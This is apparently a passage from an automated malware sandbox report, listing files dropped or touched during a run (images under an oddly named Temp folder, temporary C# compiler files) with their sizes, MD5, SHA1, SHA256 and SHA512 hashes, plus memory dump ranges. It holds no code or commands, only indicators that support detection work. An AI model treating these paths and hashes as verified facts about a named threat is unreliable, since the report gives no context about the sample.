                                                                              MD5

                                                                              a51464e41d75b2aa2b00ca31ea2ce7eb

                                                                              SHA1

                                                                              5b94362ac6a23c5aba706e8bfd11a5d8bab6097d

                                                                              SHA256

                                                                              16d5506b6663085b1acd80644ffa5363c158e390da67ed31298b85ddf0ad353f

                                                                              SHA512

                                                                              b2a09d52c211e7100e3e68d88c13394c64f23bf2ec3ca25b109ffb1e1a96a054f0e0d25d2f2a0c2145616eabc88c51d63023cef5faa7b49129d020f67ab0b1ff

                                                                            • C:\Users\Admin\AppData\Local\Temp\ ‌        \Common Files\Pictures\OptimizeConvertTo.jpg

                                                                              Filesize

                                                                              220KB

                                                                              MD5

                                                                              167a49bb88a2c6dd0231b5d1275d78bf

                                                                              SHA1

                                                                              7f09adf1a95f606b7a8b9af747892f542a5c84cd

                                                                              SHA256

                                                                              bd13ea72cdd7653204e5a663593027d80778132401932fffc824ed64b252c4a3

                                                                              SHA512

                                                                              a6624e7fe6153fd01fcadb08d295916b275320724dec70e5192a6b9e391694aff44b709d42b0cce69e251a8aeebef182f84cff8bfe2907aeb4774f75c8e578ad

                                                                            • C:\Users\Admin\AppData\Local\Temp\ ‌        \Common Files\Pictures\ResizeDisconnect.jpeg

                                                                              Filesize

                                                                              191KB

                                                                              MD5

                                                                              03abd1908f311d52ecdb631ef20becee

                                                                              SHA1

                                                                              19831976de86be54dca908035104db64a669a5ba

                                                                              SHA256

                                                                              15dc294f2daaf62b41c33cf814c18742b570847f2721439834e1dc11d865347a

                                                                              SHA512

                                                                              80c51b50907e811150d46651ab2eb74ce5123cad27c12bd3df38d0234495327820ac2e8ffb4ff3022facf5a514067009d473a3ca88923656d4f4d798365efc7b

                                                                            • C:\Users\Admin\AppData\Local\Temp\ ‌        \Common Files\Pictures\SwitchOut.jpg

                                                                              Filesize

                                                                              179KB

                                                                              MD5

                                                                              fba677f1eccf9a476c5d8b33b3a43d9e

                                                                              SHA1

                                                                              2111462f473b89cdc08afdca28495308bb07628f

                                                                              SHA256

                                                                              6b95c7cbdaaa24a7cceddfa79dc66bfedca52a75acece09c82857e6dfa167a34

                                                                              SHA512

                                                                              85b364d6ea4547f68cf61f099a47d2041b8ef0368ee6c930d8929fbc97de31300ae7aca041214943c8604efddd0b7afc66289477762f2ed1559a710c62b096ab

                                                                            • C:\Users\Admin\AppData\Local\Temp\ ‌        \Common Files\Pictures\SwitchSplit.jpeg

                                                                              Filesize

                                                                              90KB

                                                                              MD5

                                                                              f51fe9ff9e13400fd279212016c3f6bb

                                                                              SHA1

                                                                              5cd7bf7305d588f03cb4f0b18aea54641a525285

                                                                              SHA256

                                                                              053f379e49d2d0fedc64f10271e07bacca5104f199200d85932012cf71bff6bd

                                                                              SHA512

                                                                              0f5476b1cbb6aaff4c7f3fcb4bbbd9d188037a5921efc18132d857f4629e94c5182f6b26788c8b80d01d1f5394012729c2eb008d822c4932d13b272d6031a1b3

                                                                            • C:\Users\Admin\AppData\Local\Temp\ ‌        \Display (1).png

                                                                              Filesize

                                                                              418KB

                                                                              MD5

                                                                              1706ebfc6d1f50f1c17a4d5771b52d47

                                                                              SHA1

                                                                              97943a59f3ef6315e33f0d6f5d68b94bbe8a87a5

                                                                              SHA256

                                                                              3cdcbcc8633cc982a16e5e1f0295ca20dbaab762dda41e4ccad3ae6247f6cf1f

                                                                              SHA512

                                                                              53d63ef78c4274586247927d4282dcbc941aade47b617f4613a81dc98edf5322027104dd8748b67f0082d4451cfebddc7bd673f44b4642e67efa52a81e9e2c17

                                                                            • \??\c:\Users\Admin\AppData\Local\Temp\wk133bt4\CSCFF828B6DEEF482799C0DE4D8EFA6D40.TMP

                                                                              Filesize

                                                                              652B

                                                                              MD5

                                                                              41e918bfd31440ae4dea1596c29af95f

                                                                              SHA1

                                                                              a8367b173041fc54175e95691dcddd623affa674

                                                                              SHA256

                                                                              82c27b39d40d931a4f000a55240abf397ae83875ff46ea86ab0a9ff36c09be2f

                                                                              SHA512

                                                                              2aaae813d7d04b5efed6ff39bb65fedf2b95ef46b46d2a1275cff898182fde001deaf93a13d710c6ac88b752bd2d08f6a31a84f613b1f0988a98e266f796e836

                                                                            • \??\c:\Users\Admin\AppData\Local\Temp\wk133bt4\wk133bt4.0.cs

                                                                              Filesize

                                                                              1004B

                                                                              MD5

                                                                              c76055a0388b713a1eabe16130684dc3

                                                                              SHA1

                                                                              ee11e84cf41d8a43340f7102e17660072906c402

                                                                              SHA256

                                                                              8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

                                                                              SHA512

                                                                              22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

                                                                            • \??\c:\Users\Admin\AppData\Local\Temp\wk133bt4\wk133bt4.cmdline

                                                                              Filesize

                                                                              607B

                                                                              MD5

                                                                              aa56a1669ab025b03faa4be71d5c230f

                                                                              SHA1

                                                                              04ef4f5ae83eacb67036609c44521f45e923b248

                                                                              SHA256

                                                                              c7ff4aa02a33fa4c8868ded6c68aaf137fe5fb68c21c7736b68b8258f8241c32

                                                                              SHA512

                                                                              63653216f4426cebb6ad862676fbaf0e0937ecf389645c83067663f80f8bb50dc31bbcf1f4584e6e4c120cf0a2c9b343f2fc95324232ca48c64bcea2a6535414

                                                                            • memory/1488-147-0x00007FFB26A60000-0x00007FFB27522000-memory.dmp

                                                                              Filesize

                                                                              10.8MB

                                                                            • memory/1488-61-0x0000021D03B50000-0x0000021D03B72000-memory.dmp

                                                                              Filesize

                                                                              136KB

                                                                            • memory/1488-55-0x00007FFB26A60000-0x00007FFB27522000-memory.dmp

                                                                              Filesize

                                                                              10.8MB

                                                                            • memory/1488-54-0x00007FFB26A60000-0x00007FFB27522000-memory.dmp

                                                                              Filesize

                                                                              10.8MB

                                                                            • memory/1488-53-0x00007FFB26A63000-0x00007FFB26A65000-memory.dmp

                                                                              Filesize

                                                                              8KB

                                                                            • memory/2748-166-0x0000016AFE5E0000-0x0000016AFE5E8000-memory.dmp

                                                                              Filesize

                                                                              32KB